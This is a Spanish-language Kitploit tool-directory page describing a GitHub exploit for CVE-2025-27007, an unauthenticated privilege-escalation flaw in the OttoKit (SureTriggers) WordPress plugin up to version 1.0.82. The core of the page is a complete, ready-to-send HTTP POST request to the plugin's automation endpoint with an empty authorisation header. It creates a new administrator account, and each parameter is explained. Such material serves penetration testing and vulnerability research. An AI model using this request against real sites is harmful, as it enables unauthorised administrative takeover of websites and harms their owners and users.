Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-27007-OttoKit-exploit — explotación de CVE-2025-27007, una vulnerabilidad crítica de escalada de privilegios sin autenticación en el plugin OttoKit (anteriormente SureTriggers) de WordPress. | Kitploit
Herramientas/GitHubGitHub/absholi7ly/cve-2025-27007-ottokit-exploit
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAutenticaciónRed Teaming
GitHubabsholi7ly/cve-2025-27007-ottokit-exploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-27007-OttoKit-exploit

explotación de CVE-2025-27007, una vulnerabilidad crítica de escalada de privilegios sin autenticación en el plugin OttoKit (anteriormente SureTriggers) de WordPress.

Ver Repositorio
2hace 1 añoAún no revisado

CVE-2025-27007: Vulnerabilidad de Escalada de Privilegios en OttoKit (SureTriggers)

Explotación de CVE-2025-27007, una vulnerabilidad crítica de escalada de privilegios no autorizada en el plugin OttoKit (anteriormente conocido como SureTriggers) para WordPress. Este repositorio describe cómo un atacante puede crear una cuenta de administrador en un sitio WordPress vulnerable.

Versiones Afectadas

  • Todas las versiones de OttoKit (SureTriggers) ≤ 1.0.82.
  • Corregido en la versión 1.0.83.

Condiciones para la Explotación

La vulnerabilidad puede ser explotada bajo las siguientes circunstancias:

  1. OttoKit debe estar instalado y activado en el sitio WordPress objetivo.
  2. El plugin no está inicializado (por ejemplo, no se ha establecido una clave API o "secret_key" en la base de datos).
  3. El sitio objetivo muestra el endpoint de la API REST '/wp-json/sure-triggers/v1/automation/action'.

Solicitud HTTP

La siguiente solicitud apunta al endpoint /wp-json/sure-triggers/v1/automation/action para crear una cuenta de administrador:

root@kitploit:~
POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Host: [target-site]
Content-Type: application/x-www-form-urlencoded
St-Authorization: 
Content-Length: [length]

selected_options[user_name]=new_admin&selected_options[user_email][email protected]&selected_options[password]=StrongP@ssw0rd123&selected_options[role]=administrator&aintegration=WordPress&type_event=create_user_if_not_exists


Explicación de la Solicitud

  • Endpoint: POST /wp-json/sure-triggers/v1/automation/action
  • St-Authorization: (vacío): Omite la autenticación cuando el plugin no está configurado.
  • selected_options[user_name]: Nombre de usuario para la nueva cuenta (ej., new_admin).
  • selected_options[user_email]: Correo electrónico para la nueva cuenta (ej., [email protected]).
  • selected_options[password]: Contraseña para la nueva cuenta (ej., StrongP@ssw0rd123).
  • selected_options[role]: Establecido en administrator para otorgar privilegios completos.
  • type_event: Establecido en create_user_if_not_exists para activar la creación de usuario.
Descargar herramienta